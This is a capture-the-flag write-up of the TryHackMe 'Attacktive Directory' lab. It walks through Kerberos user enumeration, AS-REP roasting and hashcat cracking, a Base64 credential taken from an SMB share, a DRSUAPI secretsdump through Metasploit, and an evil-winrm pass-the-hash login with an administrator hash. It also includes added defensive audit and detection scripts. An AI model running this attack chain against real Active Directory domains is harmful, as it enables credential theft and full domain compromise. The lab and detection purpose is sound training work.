Attacktive Directory
These notes are from a challenge I did @tryhackme called attacktivedirectory.
Prepare
Install Impacket, kerbrute, evil-winrm, Bloodhound and Neo4j:
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && sudo python3 ./setup.py install
sudo apt install bloodhound neo4j
go get github.com/ropnop/kerbrute
gem install evil-winrm
sudo apt update && sudo apt upgrade
Scan
Scan target with nmap -sC -sV 10.10.12.33
Nmap output
``` txt
Nmap scan report for 10.10.12.33
Host is up (0.021s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-19 19:17:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|   System_Time: 2021-08-19T19:17:27+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-08-18T18:37:51
|_Not valid after: 2022-02-17T18:37:51
|_ssl-date: 2021-08-19T19:17:35+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|     Message signing enabled and required
| smb2-time:
|   date: 2021-08-19T19:17:29
|   start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
```
Enumerating Users via Kerberos
Enumerate port 139/445 with enum4linux -U -o 10.10.12.33
enum4linux output
``` txt
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 19 15:24:22 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.12.33
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===================================================
|    Enumerating Workgroup/Domain on 10.10.12.33    |
 ===================================================
[E] Can't find workgroup/domain

 ====================================
|    Session Check on 10.10.12.33    |
 ====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.12.33 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 ==========================================
|    Getting domain SID for 10.10.12.33    |
 ==========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

 =====================================
|    OS information on 10.10.12.33    |
 =====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.12.33 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.12.33 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================
|    Users on 10.10.12.33    |
 ============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
enum4linux complete on Thu Aug 19 15:24:34 2021
```
Abusing Kerberos
ASREPRoasting with kerbrute and the provided userlist: ./kerbrute -domain spookysec.local -dc-ip 10.10.12.33 -users ~/userlist.txt
kerbrute output
``` txt
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation

[*] Valid user => james
[*] Valid user => svc-admin [NOT PREAUTH]
[*] Valid user => James
[*] Valid user => robin
[*] Blocked/Disabled user => guest
[*] Valid user => darkstar
[*] Valid user => administrator
[*] Valid user => backup
[*] Valid user => paradox
[*] Valid user => JAMES
[*] Valid user => Robin
[*] Blocked/Disabled user => Guest
[*] Valid user => Administrator
[*] Valid user => Darkstar
[*] Valid user => Paradox
[*] Valid user => DARKSTAR
[*] Valid user => ori
[*] Valid user => ROBIN
[*] Blocked/Disabled user => GUEST
[*] No passwords were discovered :'(
```
GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.12.33
``` txt
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL: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
```
We received a Kerberos Ticket (Kerberos 5 AS-REP etype 23, mode 18200) which we can crack using hashcat and the provided passwordlist: hashcat -a 0 -m 18200 ~/example.hash ~/passwordlist.txt
hashcat output
``` txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-Intel(R) Xeon(R) Platinum 8171M CPU @ 2.60GHz, 13896/13960 MB (4096 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB

Dictionary cache built:
* Filename..: /home/fab1/passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL: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:management2005

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca...7c1261
Guess.Base.......: File (/home/fab1/passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 158.0 kH/s (10.67ms) @ Accel:64 Loops:1 Thr:64 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 16384/70188 (23.34%)
Rejected.........: 0/16384 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> cowgirlup

Started: 15:44:40
Stopped: 15:45:18
```
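The defender's view of the step above, as an added example that is not part of the original write-up: it audits userAccountControl for the DONT_REQ_PREAUTH flag that made svc-admin answer without pre-authentication, and triages event ID 4768 records for TGT requests issued without pre-auth. The account flag values and log records are constructed for the demo.

```python
# Added example: AS-REP roasting exposure audit and 4768 triage.
ACCOUNTDISABLE = 0x0002        # userAccountControl: account is disabled
DONT_REQ_PREAUTH = 0x400000    # userAccountControl: Kerberos pre-auth not required
RC4_HMAC = 0x17                # etype 23, the type hashcat mode 18200 works on

# Constructed directory export (sAMAccountName -> userAccountControl).
# Account names come from the write-up; the flag values are assumed.
ACCOUNTS = {
    "svc-admin": 0x410200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    "backup": 0x010200,     # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "james": 0x000200,      # NORMAL_ACCOUNT
    "guest": 0x400202,      # pre-auth off, but the account is disabled
}

# Constructed Security-log records for event ID 4768 (Kerberos TGT requested).
EVENTS_4768 = [
    {"TargetUserName": "svc-admin", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.9.193.173"},
    {"TargetUserName": "james", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.12.50"},
    {"TargetUserName": "svc-admin", "PreAuthType": "0",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.12.60"},
]


def roastable_accounts(accounts):
    """Enabled accounts whose AS-REP can be requested without pre-authentication."""
    return sorted(
        name for name, uac in accounts.items()
        if (uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)
    )


def triage_as_requests(events):
    """Return (user, source, severity) for TGT requests issued without pre-auth."""
    hits = []
    for ev in events:
        if int(ev["PreAuthType"]) != 0:
            continue  # requester had to prove knowledge of the key first
        etype = int(ev["TicketEncryptionType"], 16)
        severity = "high" if etype == RC4_HMAC else "medium"
        hits.append((ev["TargetUserName"], ev["IpAddress"], severity))
    return hits


if __name__ == "__main__":
    print("fix userAccountControl on:", roastable_accounts(ACCOUNTS))
    for hit in triage_as_requests(EVENTS_4768):
        print("4768 without pre-auth:", hit)
```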
Back to the Basics
Let's enumerate any shares that the domain controller may be giving out with smbclient: smbclient -L \\\\10.10.12.33 -U svc-admin@spookysec.local
smbclient user output
``` txt
Enter svc-admin@spookysec.local's password:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backup          Disk
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
Backup seems like an interesting share. Let's view its content: smbclient \\\\10.10.12.33\\backup -U svc-admin@spookysec.local
smbclient backup output
``` txt
Enter svc-admin@spookysec.local's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

        8247551 blocks of size 4096. 3636330 blocks available
smb: \> more backup_credentials.txt
```
backup_credentials.txt contains some kind of hash which we can try to identify e.g. with decodify: dcode YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
dcode backup_credentials.txt
``` txt
[+] Decoded from Base64 : backup@spookysec.local:backup2517860
```
Elevating Privileges within the Domain
Now that we know this is Base64 we can run this command to read the content: echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
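A share audit that would have caught this file, as an added example that is not part of the original write-up: it looks for Base64 tokens that decode to a user:secret pair and reports only the account name. The file set, the regular expressions and the function names are assumptions made for the demo; the first sample value is the string shown above.

```python
import base64
import binascii
import re

# A run of Base64 alphabet long enough to hold "user@domain:password".
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Decoded text shaped like an account name, a colon, then a secret.
CREDENTIAL = re.compile(r"^[\w.-]+(?:@[\w.-]+)?:\S{4,}$")

# Constructed share contents. The first value is the string shown in the
# write-up; the second file is made up to exercise the negative path.
SHARE_FILES = {
    "backup_credentials.txt": "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw",
    "notes.txt": "Rotate tapes weekly. Ticket ref AAAAAAAAAAAAAAAAAAAA, owner IT.",
}


def find_encoded_credentials(text):
    """Return account names found inside Base64 tokens that decode to user:secret."""
    accounts = []
    for token in B64_TOKEN.findall(text):
        if len(token) % 4:
            continue  # not whole 4-character groups, so not valid Base64
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # looked like Base64 but is not encoded text
        if CREDENTIAL.match(decoded):
            accounts.append(decoded.split(":", 1)[0])  # report who, never the secret
    return accounts


def scan_share(files):
    """Map each file name to the accounts whose credentials it exposes."""
    report = {}
    for name, text in files.items():
        found = find_encoded_credentials(text)
        if found:
            report[name] = found
    return report


if __name__ == "__main__":
    for name, accounts in scan_share(SHARE_FILES).items():
        print(f"{name}: encoded credentials for {', '.join(accounts)}")
```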
Running secretsdump.py didn't work for me e.g.: secretsdump.py spookysec.local/backup:backup2517860@10.10.12.33 -use-vss
So I used metasploit with secretsdump.py and set lhost, SMBDomain, RHOSTS, SMBPass and SMBUser accordingly: msfconsole
metasploit with secretsdump.py
``` txt
       =[ metasploit v6.1.0-dev                           ]
+ -- --=[ 2157 exploits - 1146 auxiliary - 367 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: View all productivity tips with the tips command

msf6 > search secretsdump

Matching Modules

   #  Name                                                       Disclosure Date  Rank    Check  Description
   -  ----                                                       ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/impacket/secretsdump                                  normal  No     DCOM Exec
   1  post/windows/gather/credentials/windows_sam_hivenightmare  2021-07-20       normal  No     Windows SAM secrets leak - HiveNightmare
   2  auxiliary/gather/windows_secrets_dump                                       normal  No     Windows Secrets Dump

Interact with a module by name or index. For example info 2, use 2 or use auxiliary/gather/windows_secrets_dump

msf6 > use auxiliary/scanner/smb/impacket/secretsdump
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set lhost 10.9.193.173
lhost => 10.9.193.173
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBDomain spookysec.local
SMBDomain => spookysec.local
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set RHOSTS 10.10.12.33
RHOSTS => 10.10.12.33
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBPass backup2517860
SMBPass => backup2517860
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBUser backup
SMBUser => backup
msf6 auxiliary(scanner/smb/impacket/secretsdump) > exploit
[*] Running for 10.10.12.33...
[-] 10.10.12.33 - RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] 10.10.12.33 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 10.10.12.33 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 10.10.12.33 - Kerberos keys grabbed
[*] 10.10.12.33 - Cleaning up...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
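How the DRSUAPI replication in the output above looks from the domain controller's side, as an added example that is not part of the original write-up: it scans event ID 4662 records for the replication extended rights being exercised by an account that is not a domain controller. The log records, the single-DC allow-list and the function name are assumptions for the demo.

```python
import re

# Extended rights that gate directory replication (documented AD control-access GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS = 0x100   # AccessMask bit for "Control Access" (extended right used)
GUID = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Assumption: the lab has one domain controller, named as in the nmap output.
DOMAIN_CONTROLLERS = {"ATTACKTIVEDIREC$"}

# Constructed Security-log records for event ID 4662 (operation on a directory object).
EVENTS_4662 = [
    {"SubjectUserName": "ATTACKTIVEDIREC$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "AccessMask": "0x100",
     "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"SubjectUserName": "backup", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "james", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def detect_replication_abuse(events, domain_controllers):
    """Map each non-DC account to a verdict based on the replication rights it used."""
    used = {}
    for ev in events:
        if not int(ev["AccessMask"], 16) & CONTROL_ACCESS:
            continue  # plain property read/write, not an extended right
        rights = {REPLICATION_RIGHTS[g.lower()]
                  for g in GUID.findall(ev["Properties"])
                  if g.lower() in REPLICATION_RIGHTS}
        if rights and ev["SubjectUserName"].upper() not in domain_controllers:
            used.setdefault(ev["SubjectUserName"], set()).update(rights)
    # Get-Changes plus Get-Changes-All together allow password data to be replicated.
    return {user: "critical" if len(r) == len(REPLICATION_RIGHTS) else "review"
            for user, r in used.items()}


if __name__ == "__main__":
    for user, verdict in detect_replication_abuse(EVENTS_4662, DOMAIN_CONTROLLERS).items():
        print(f"{user}: replication rights used by a non-DC account ({verdict})")
```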
Secretsdump.py uses the DRSUAPI method to get NTDS.DIT secrets. We can feed evil-winrm with the hash of the administrator to gain access using this command: evil-winrm -i 10.10.12.33 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
evil-winrm output and flags
``` txt
Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
*Evil-WinRM* PS C:\Users\backup\Desktop> more PrivEsc.txt
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> more user.txt.txt
```
Whoop Whoop, now we have the flags for Administrator, backup and svc-admin ^^